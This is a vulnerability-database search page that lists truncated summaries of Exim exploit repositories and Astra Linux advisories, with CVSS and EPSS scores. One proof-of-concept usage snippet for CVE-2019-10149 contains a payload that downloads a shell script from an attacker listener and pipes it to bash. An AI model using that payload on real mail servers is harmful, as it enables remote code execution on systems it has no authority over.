Lucene search
+L

2283 matches found

Kitploit
Kitploit
added 2026/09/16 8:53 a.m.6 views

eximrce-CVE-2019-10149

eximrce Simple python socket connection to test if exim is vulnerable to CVE-2019-10149. The payload simply touch a file in /root/lweximtest. Output will be slow depending on server's reply and not knowing how to properly use python's socket module. Would love a lesson on how to speed it up. Only...

10CVSS9AI score0.99961EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/16 6:48 a.m.12 views

exim-cve-2019-10149-data

Exim CVE Data Collection Data Collection Related to Exim Vulnerabilities CVE-2019-10149, CVE-2019-15846, CVE-2019-16928 CVE Announcement: https://vulners.com/cve/CVE-2019-10149 Exploit Details: https://www.exploit-db.com/exploits/46974 Issue Timeline: https://seclists.org/fulldisclosure/2019/Jun/...

10CVSS8.8AI score0.99961EPSS
SaveExploits29References1
Kitploit
Kitploit
added 2026/09/16 4:13 a.m.12 views

Exim-CVE-2018-6789

Exim CVE-2018-6789 PoC materials to exploit CVE-2018-6789. Blogpost explaining the PoC is available on Synacktiv Blog. This PoC connects to a vulnerable Exim server and exploits CVE-2018-6789. Usage root@kitploit: usage: exploit -hv options: -h, --help Print this help -v, --verbose Enable verbose...

9.8CVSS8.3AI score0.82137EPSS
SaveExploits19
Kitploit
Kitploit
added 2026/09/16 1:43 a.m.7 views

CVE-2018-6789

CVE-2018-6789 Environment Setup Install dependencies root@kitploit: apt-get install gcc net-tools vim gdb python wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev Download an old version of exim root@kitploit: wget ftp://mirror.easyname.at/exim-ftp/exim/exim4/old/exim-4.89.tar.gz...

9.8CVSS8.3AI score0.82137EPSS
SaveExploits19
Kitploit
Kitploit
added 2026/09/16 12:10 a.m.7 views

Exim-CVE-2019-15846

Exim CVE-2019-15846 PoC materials to exploit CVE-2019-15846. Blogpost explaining the PoC is available on Synacktiv Blog. This PoC help generate spool files used exploit a heap overflow in exim. Two example spool files are given in 1i7Jgy-0002dD-Pb-D and 1i7Jgy-0002dD-Pb-H. A specialy crafted spoo...

10CVSS8.6AI score0.35736EPSS
SaveExploits3References3
Kitploit
Kitploit
added 2026/09/15 9:51 p.m.11 views

exim-vuln-poc

CVE-2018-6789...

9.8CVSS8.5AI score0.82137EPSS
SaveExploits19
Kitploit
Kitploit
added 2026/09/15 9:34 p.m.7 views

CVE-2017-16943

CVE-2017-16943 Environment Setup root@kitploit: git clone https://github.com/Exim/exim.git git checkout 01c594601670c7e48e676d6c6d32d0f0084067fa cd ./exim/src mkdir Local wget "https://bugs.exim.org/attachment.cgi?id=1051" -O Makefile Modify the path variables and username in the Makefile...

9.8CVSS8.6AI score0.46705EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/15 9:26 p.m.5 views

Exim-CVE-2019-10149

Exim-CVE-2019-10149 PoC for exploitation of vulnerability CVE-2019-10149 Usage example python3 PoC.py --rhost 192.168.1.100 --lhost 10.10.10.10 --lport 4444 --payload '/bin/sh -c wget http://10.10.10.10:8000/shell.sh -O - | bash'...

10CVSS8.5AI score0.99961EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/15 7:48 p.m.9 views

CVE-2020-28018

CVE-2020-28018: Exim Use-after-free UAF leading to RCE Introduction There exists a Use-after-free UAF vulnerability in tls-openssl.c that allow remote unauthenticated attackers to corrupt internal memory data, thus finally achieving remote code execution. Primitives: Memory Leakage Arbitrary read...

9.8CVSS7.9AI score0.5675EPSS
SaveExploits3References1
Kitploit
Kitploit
added 2026/09/15 3:52 p.m.7 views

exim-rce-quickfix

This repository does not have a README...

5.7AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/15 2:28 p.m.7 views

CVE-2019-10149

CVE-2019-10149 - Exim 4.87 Local/Makefile cp eximmonitor/EDITME Local/eximon.conf Create exim user and group sudo groupadd -g 31 exim sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim Install dependencies sudo apt-get update sudo apt-get install -y make build-essential...

10CVSS8.4AI score0.99961EPSS
SaveExploits27References2
Kitploit
Kitploit
added 2026/09/15 1:40 p.m.7 views

nmap-nse-vulnerability-scripts

NMAP vulnerability scanning scripts A collection of nmap vulnerability scanning scripts to aid afforable detection and remediation. Background These scripts use the Nmap Scripting Engine NSE to implement checks for various vulnerabilities. References: https://nmap.org/book/man-nse.html...

6AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/15 12:31 p.m.28 views

exim.exp

Simple exploit for vuln in exim 4.87 - 4.91 inclusive...

5.7AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/15 10:53 a.m.8 views

CVE-2019-10149

CVE-2019-10149 - Exim 4.87 Local/Makefile cp eximmonitor/EDITME Local/eximon.conf Create exim user and group sudo groupadd -g 31 exim sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim Install dependencies sudo apt-get update sudo apt-get install -y make build-essential...

10CVSS8.5AI score0.99961EPSS
SaveExploits27References1
Kitploit
Kitploit
added 2026/09/15 6:01 a.m.10 views

CVE-2024-39929

Exim CVE-2024-39929 Exploit PoC This repository contains a Proof-of-Concept PoC script to exploit the Exim vulnerability CVE-2024-39929. The vulnerability affects Exim versions prior to 4.98, allowing attackers to bypass file extension blocking mechanisms and potentially deliver executable...

5.4CVSS6.7AI score0.41225EPSS
SaveExploits5
Kitploit
Kitploit
added 2026/09/14 2:23 p.m.8 views

exim-rce-cve-2018-6789

Exim RCE CVE-2018-6789 Learning Environment Description This is a set of files, scripts, notes, ... to set up an environment to investigate the Exim RCE CVE-2018-6789. It can be used to debug Exim, write exploits, trace Exim function calls, learn about Exim's custom memory management storeblocks,...

9.8CVSS8.3AI score0.82137EPSS
SaveExploits19
AstraLinux
AstraLinux
added 2026/09/14 12:41 p.m.11 views

Astra Linux – Vulnerability in exim4

Exim before version 4.95 has a heap-based buffer overflow for the alias list in hostnamelookup in host.c when senderhostname is set...

9.8CVSS8.6AI score0.03825EPSS
SaveExploits1References2
AstraLinux
AstraLinux
added 2026/09/14 12:41 p.m.12 views

Astra Linux – Vulnerability in exim4

Exim 4 before 4.94.2 has an improper restriction on write operations within the bounds of a memory buffer. This occurs when processing name=value pairs within MAIL FROM and RCPT TO commands...

9.8CVSS7.6AI score0.03017EPSS
SaveExploits1References1
AstraLinux
AstraLinux
added 2026/09/14 12:41 p.m.9 views

Astra Linux – Vulnerability in exim4

Exim 4 before 4.94.2 allows Heap-based Buffer Overflows because it mishandles the "-F’.‘” syntax on the command line. This may allow privilege escalation from any user to root. This issue occurs due to the incorrect interpretation of negative sizes in the strncpy function...

7.8CVSS7.7AI score0.00393EPSS
SaveExploits1References1
AstraLinux
AstraLinux
added 2026/09/14 12:41 p.m.12 views

Astra Linux – Vulnerability in exim4

Exim 4 before 4.94.2 allowed out-of-bounds read vulnerabilities. The smtpsetupmsg function may disclose sensitive information from the process memory to an unauthenticated SMTP client...

7.5CVSS7.5AI score0.02606EPSS
SaveExploits1References1
Rows per page
Query Builder